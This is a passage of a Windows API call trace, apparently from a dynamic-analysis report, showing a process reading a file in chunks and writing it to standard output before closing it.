_get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 
0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.333] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.333] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) 
returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0142.334] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.334] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.335] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.335] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType 
(hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.336] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.336] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, 
lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, 
lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.337] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.338] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.339] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.340] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x32, lpOverlapped=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.340] GetFileType (hFile=0x4c) returned 0x1 [0142.340] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.340] GetFileType (hFile=0x4c) returned 0x1 [0142.340] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.340] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x32, lpOverlapped=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.340] _close (_FileHandle=4) returned 0 [0142.340] FindNextFileW (in: 
